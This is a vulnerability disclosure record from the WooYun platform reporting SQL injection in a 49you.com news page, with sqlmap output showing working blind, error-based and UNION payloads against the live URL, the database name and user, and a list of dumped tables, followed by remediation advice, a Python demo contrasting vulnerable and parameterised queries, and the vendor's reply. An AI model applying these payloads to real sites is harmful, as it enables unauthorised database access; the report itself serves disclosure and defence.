
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0122803

Title: SQL injection vulnerability in a 49you service

Vendor: 49you.com

Author: xyang

Submitted: 2015-06-26 09:33

Fixed: 2015-08-13 10:04

Published: 2015-08-13 10:04

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-26: Details sent to the vendor, awaiting vendor handling
2015-06-29: Vendor confirmed; details visible to the vendor only
2015-07-09: Details disclosed to core white hats and domain experts
2015-07-19: Details disclosed to regular white hats
2015-07-29: Details disclosed to intern white hats
2015-08-13: Details disclosed to the public

Brief description:

Honestly, vendor, I am genuinely trying to help you here :)

Detailed description:

Affected URL:

http://i.49you.com/news/item/catid/55/id/15.html


Vulnerable parameter: catid (a path-style parameter, so sqlmap reports it as URI injection point `#1*`)
Appending a single quote to its value triggers a database error in the response.

(screenshot: 811F170B-EF2E-4DB8-9C5D-731F3B2376CC.png, the error page after the single quote)


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://i.49you.com:80/news/item/catid/55 AND 3684=3684/id/15.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://i.49you.com:80/news/item/catid/55 AND (SELECT 4621 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(4621=4621,1))),0x716a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)/id/15.html
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: http://i.49you.com:80/news/item/catid/55 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b6a71,0x6b4a4c4e7a5864654f71,0x716a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- /id/15.html
---
[23:37:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL 5.0


current database: 'i_49you'
current user: 'i_49you@%'


Dumping some data

(screenshot: admin.png, contents of the admin table)


Database: i_49you
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| linkage           |    3284 |
| log               |    2243 |
| menu              |     331 |
| model_field       |     211 |
| attachment        |     148 |
| attachment_index  |     106 |
| category_priv     |     103 |
| keyword_data      |      65 |
| admin_role_priv   |      61 |
| keyword           |      49 |
| cache             |      40 |
| hits              |      34 |
| search            |      34 |
| `module`          |      26 |
| category          |      19 |
| poster            |      17 |
| type              |      16 |
| news              |      11 |
| news_data         |      11 |
| model             |      10 |
| link              |       8 |
| urlrule           |       8 |
| member_group      |       7 |
| poster_space      |       6 |
| test_artice_data  |       6 |
| game              |       5 |
| game_data         |       5 |
| page              |       5 |
| sso_settings      |       5 |
| test_artice       |       5 |
| workflow          |       4 |
| admin             |       3 |
| member_menu       |       3 |
| site              |       3 |
| admin_role        |       2 |
| test_picture      |       2 |
| test_picture_data |       2 |
| `session`         |       1 |
| sso_admin         |       1 |
| sso_applications  |       1 |
| wap               |       1 |
+-------------------+---------+

Proof of vulnerability:

See above.

Remediation:

1. Validate the catid parameter: it is a numeric id, so cast it to an integer (or bind it through a prepared statement) before it reaches the query, rather than trying to escape it.
2. Disable display of database error messages on the production site; the error-based technique shown above depends on them.
I don't know what this is worth; I'll leave that to the vendor.
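As an added example that is not part of the original report and not 49you's code, the following models the flaw and the two remediation points in Python against a constructed in-memory SQLite table: a parser for the site's path-style parameters, a query builder that interpolates the raw `catid` segment the way the vulnerable page evidently does, and a hardened version that casts `catid`/`id` to integers and binds them. The `news` schema, the sample rows, and every function name here are assumptions; the real site runs PHP on MySQL, so only the single-quote error and the boolean-based blind payload from the sqlmap output are reproduced (the error-based and UNION payloads are MySQL-specific).

```python
"""Vulnerable vs. hardened handling of the path-style catid/id parameters.

Added example, not code from the original report or from 49you. The schema,
sample rows and function names are assumptions; SQLite stands in for MySQL.
"""
import re
import sqlite3

# Constructed sample rows standing in for the site's `news` table (assumed schema).
SAMPLE_NEWS = [
    (15, 55, "Patch notes"),
    (16, 55, "Event schedule"),
    (17, 60, "Unrelated category"),
]


def make_db():
    """In-memory SQLite database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, catid INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", SAMPLE_NEWS)
    return conn


def parse_path_params(path):
    """Map /news/item/catid/55/id/15.html to {'catid': '55', 'id': '15'}.

    Path-style routing: the segments after controller/action come in key/value
    pairs. Nothing here validates the values, which is why a payload placed in
    the catid segment reaches the query untouched.
    """
    path = path.split("?", 1)[0]
    if path.endswith(".html"):
        path = path[: -len(".html")]
    segments = path.strip("/").split("/")[2:]  # drop 'news', 'item'
    return {segments[i]: segments[i + 1] for i in range(0, len(segments) - 1, 2)}


def fetch_news_vulnerable(conn, params):
    """Interpolates raw path segments into SQL: the pattern behind the finding."""
    sql = "SELECT id, title FROM news WHERE catid = %s AND id = %s" % (
        params["catid"],
        params["id"],
    )
    return conn.execute(sql).fetchall()


def parse_int(value, max_digits=10):
    """Accept only a plain decimal id; anything else is rejected, not 'escaped'."""
    if value is None or not re.fullmatch(r"[0-9]{1,%d}" % max_digits, value):
        return None
    return int(value)


def fetch_news_hardened(conn, params):
    """Casts both ids to int and binds them, so injected SQL never parses as SQL."""
    catid = parse_int(params.get("catid"))
    news_id = parse_int(params.get("id"))
    if catid is None or news_id is None:
        # Generic failure: no database error text is surfaced to the client.
        raise ValueError("invalid request")
    return conn.execute(
        "SELECT id, title FROM news WHERE catid = ? AND id = ?", (catid, news_id)
    ).fetchall()


def probe(conn, fetch, path):
    """Simulate one request; returns ('rows', count) or ('error', exception name)."""
    try:
        return ("rows", len(fetch(conn, parse_path_params(path))))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    db = make_db()
    probes = [
        "/news/item/catid/55/id/15.html",                # legitimate request
        "/news/item/catid/55'/id/15.html",               # single quote -> DB error
        "/news/item/catid/55 AND 3684=3684/id/15.html",  # boolean-blind TRUE
        "/news/item/catid/55 AND 3684=3685/id/15.html",  # boolean-blind FALSE
    ]
    for p in probes:
        print(f"{p!r:50} vulnerable={probe(db, fetch_news_vulnerable, p)} "
              f"hardened={probe(db, fetch_news_hardened, p)}")
```

Against the vulnerable builder the quote produces a database error and the two boolean payloads return one row and zero rows respectively, which is the page difference sqlmap keys on; against the hardened builder all three are rejected before any SQL runs, with the same generic error, so neither the error-based nor the blind technique has anything to observe.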

Copyright notice: when reproducing, credit the source as xyang@乌云


Vulnerability response

Vendor response:

Severity: Low

Rank: 5

Confirmed: 2015-06-29 10:02

Vendor reply:

Many thanks to white hat @xyang; our engineers are working on an emergency fix.

Latest status:

None yet